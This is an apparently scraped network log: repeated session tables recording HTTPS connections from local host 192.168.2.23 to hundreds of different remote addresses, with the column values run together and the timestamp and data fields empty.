                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17259192.168.2.233426675.121.9.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17260192.168.2.2337076141.227.182.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17261192.168.2.235281096.78.70.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17262192.168.2.2346120197.241.245.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17263192.168.2.2356772137.150.25.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17264192.168.2.2333950141.92.184.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17265192.168.2.234491287.171.68.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17266192.168.2.2335282206.9.2.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17267192.168.2.2348540146.255.213.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17268192.168.2.2334762116.144.209.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17269192.168.2.234221490.96.174.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17270192.168.2.235104236.72.77.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17271192.168.2.234088071.255.31.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17272192.168.2.2338744145.44.153.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17273192.168.2.2357640216.232.25.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17274192.168.2.2338388126.76.235.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17275192.168.2.234553867.201.26.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17276192.168.2.2335958173.133.147.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17277192.168.2.233984641.35.75.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17278192.168.2.2358378121.54.152.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17279192.168.2.2340044158.107.22.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17280192.168.2.233918882.242.70.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17281192.168.2.2336004103.191.138.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17282192.168.2.2338950212.34.161.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17283192.168.2.236016040.163.68.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17284192.168.2.2343708179.90.19.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17285192.168.2.2356226180.193.217.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17286192.168.2.2352476200.214.98.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17287192.168.2.2350902150.216.55.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17288192.168.2.2335318106.36.201.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17289192.168.2.2354866182.135.177.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17290192.168.2.2333354176.91.130.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17291192.168.2.234686251.7.161.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17292192.168.2.233309685.76.83.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17293192.168.2.2356406160.110.228.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17294192.168.2.235113271.222.245.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17295192.168.2.23428442.181.143.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17296192.168.2.2348172166.236.155.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17297192.168.2.2349558137.61.26.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17298192.168.2.2350124132.233.173.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17299192.168.2.2344770194.147.184.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17300192.168.2.235033483.253.82.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17301192.168.2.2358404167.123.86.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17302192.168.2.2353338177.216.58.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17303192.168.2.2350856170.145.93.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17304192.168.2.2350638220.253.71.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17305192.168.2.2333312129.203.74.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17306192.168.2.2346790150.88.29.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17307192.168.2.2345372181.199.55.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17308192.168.2.2338524149.198.145.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17309192.168.2.235879473.35.159.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17310192.168.2.2359778211.62.158.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17311192.168.2.233355252.79.204.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17312192.168.2.234272461.171.35.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17313192.168.2.234604650.33.196.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17314192.168.2.234686289.8.221.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17315192.168.2.2341698168.157.206.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17316192.168.2.2342688163.20.222.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17317192.168.2.2343562119.28.46.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17318192.168.2.2359572140.45.125.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17319192.168.2.2335888210.7.250.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17320192.168.2.235294291.66.208.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17321192.168.2.235610285.103.133.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17322192.168.2.2357332108.168.221.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17323192.168.2.234800079.1.225.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17324192.168.2.2360446152.198.190.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17325192.168.2.2341906192.232.176.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17326192.168.2.2352058200.180.219.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17327192.168.2.233625454.63.102.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17328192.168.2.2341410163.53.112.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17329192.168.2.235282688.88.225.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17330192.168.2.2348108191.112.83.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17331192.168.2.2358912206.208.102.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17332192.168.2.2358984113.181.39.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17333192.168.2.2351200180.197.176.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17334192.168.2.2345886199.243.217.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17335192.168.2.2337274143.207.236.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17336192.168.2.2346126193.200.73.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17337192.168.2.2332842145.94.38.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17338192.168.2.234016868.239.224.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17339192.168.2.234874851.230.153.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17340192.168.2.233712225.196.127.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17341192.168.2.234498235.122.159.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17342192.168.2.2360828125.34.234.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17343192.168.2.2360542139.32.110.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17344192.168.2.23488048.175.107.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17345192.168.2.2352986143.28.87.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17346192.168.2.2345264191.128.155.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17347192.168.2.2334084209.31.251.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17348192.168.2.2346206167.229.102.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17349192.168.2.2356824159.36.145.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17350192.168.2.234876676.249.103.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17351192.168.2.234763045.43.75.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17352192.168.2.2355062151.203.5.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17353192.168.2.235517836.218.107.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17354192.168.2.235226239.134.63.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17355192.168.2.235481285.64.193.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17356192.168.2.2357134184.101.58.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17357192.168.2.233321083.53.31.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17358192.168.2.2343298109.114.91.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17359192.168.2.236063454.254.75.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17360192.168.2.234193051.130.212.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17361192.168.2.233587638.10.72.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17362192.168.2.2345562128.108.195.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17363192.168.2.235298817.55.127.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17364192.168.2.235808854.151.232.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17365192.168.2.235115239.61.60.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17366192.168.2.235488489.219.83.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17367192.168.2.2347270179.227.175.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17368192.168.2.2348226176.0.250.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17369192.168.2.2359874202.169.147.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17370192.168.2.234461623.199.238.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17371192.168.2.2344840180.185.125.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17372192.168.2.2357088223.243.9.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17373192.168.2.2337612147.222.191.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17374192.168.2.2333328167.217.36.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17375192.168.2.235130842.253.9.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17376192.168.2.235629697.232.23.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17377192.168.2.235692847.164.108.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17378192.168.2.2341762221.249.185.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17379192.168.2.234299025.165.131.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17380192.168.2.235173859.92.85.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17381192.168.2.2338042183.45.34.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17382192.168.2.2336290203.203.3.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17383192.168.2.236047286.116.214.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17384192.168.2.2343480194.38.115.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17385192.168.2.2342580202.16.167.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17386192.168.2.2348456182.110.137.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17387192.168.2.235060678.126.24.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17388192.168.2.2359720197.156.95.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17389192.168.2.23507562.151.202.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17390192.168.2.2348784101.136.178.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17391192.168.2.235567067.54.10.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17392192.168.2.234817287.181.125.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17393192.168.2.2338668170.158.206.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17394192.168.2.2341566216.9.10.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17395192.168.2.2341804203.122.209.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17396192.168.2.2347262130.194.39.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17397192.168.2.233684223.140.17.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17398192.168.2.2338434148.253.144.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17399192.168.2.2336604144.159.72.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17400192.168.2.235004242.66.147.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17401192.168.2.2341232163.93.249.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17402192.168.2.2356370147.148.87.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17403192.168.2.2352302186.204.250.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17404192.168.2.2344014213.163.255.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17405192.168.2.2354614166.247.153.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17406192.168.2.234936625.0.28.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17407192.168.2.235425613.60.31.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17408192.168.2.236013665.171.42.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17409192.168.2.233366824.178.231.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17410192.168.2.233772451.111.28.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17411192.168.2.236060094.58.167.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17412192.168.2.2344768113.66.158.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17413192.168.2.2348210180.13.142.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17414192.168.2.236093080.227.151.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17415192.168.2.2347222172.32.129.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17416192.168.2.233633045.240.228.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17417192.168.2.2353904144.27.41.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17418192.168.2.2352766136.143.75.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17419192.168.2.234593896.104.87.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17420192.168.2.2357348138.3.97.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17421192.168.2.2342298115.213.118.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17422192.168.2.23554704.185.73.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17423192.168.2.233752645.178.26.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17424192.168.2.235681447.220.91.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17425192.168.2.2349602142.127.155.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17426192.168.2.2356796140.156.68.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17427192.168.2.2333118143.73.168.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17428192.168.2.235962491.88.187.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17429192.168.2.2342704143.68.108.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17430192.168.2.2360920186.105.235.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17431192.168.2.2337178166.124.224.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17432192.168.2.2338060114.233.119.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17433192.168.2.2354488131.231.140.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17434192.168.2.2342872198.245.33.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17435192.168.2.234693046.117.8.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17436192.168.2.234064249.27.246.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17437192.168.2.2333792164.9.153.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17438192.168.2.2349818137.32.67.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17439192.168.2.2338428200.94.23.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17440192.168.2.235791893.6.134.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17441192.168.2.2344798195.29.203.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17442192.168.2.234872065.60.121.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17443192.168.2.2343668101.137.249.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17444192.168.2.2338762120.48.47.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17445192.168.2.233352637.182.29.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17446192.168.2.2360784157.107.249.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17447192.168.2.2353428177.43.17.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17448192.168.2.235547244.219.7.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17449192.168.2.2348318109.183.77.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17450192.168.2.2352100141.166.99.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17451192.168.2.23514142.195.219.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17452192.168.2.2337614168.105.217.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17453192.168.2.233497454.244.109.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17454192.168.2.23536989.216.205.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17455192.168.2.2359912128.175.65.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17456192.168.2.2336598200.202.194.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17457192.168.2.235238223.200.39.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17458192.168.2.234941070.167.22.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17459192.168.2.2333448201.227.231.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17460192.168.2.23518905.105.143.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17461192.168.2.234291440.164.4.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17462192.168.2.2351082131.28.21.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17463192.168.2.2355392165.141.163.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17464192.168.2.2356474106.61.33.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17465192.168.2.2358584151.191.139.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17466192.168.2.2343630114.169.53.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17467192.168.2.234906466.32.201.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17468192.168.2.235389286.238.158.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17469192.168.2.23429029.209.89.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17470192.168.2.2355478128.202.83.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17471192.168.2.2352828161.201.237.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17472192.168.2.2350368130.250.70.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17473192.168.2.2346240112.90.58.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17474192.168.2.235340277.21.143.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17475192.168.2.2341178117.88.254.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17476192.168.2.2344432183.218.243.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17477192.168.2.2343824175.183.132.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17478192.168.2.234090464.59.13.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17479192.168.2.234809849.208.2.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17480192.168.2.2349640170.74.122.79443
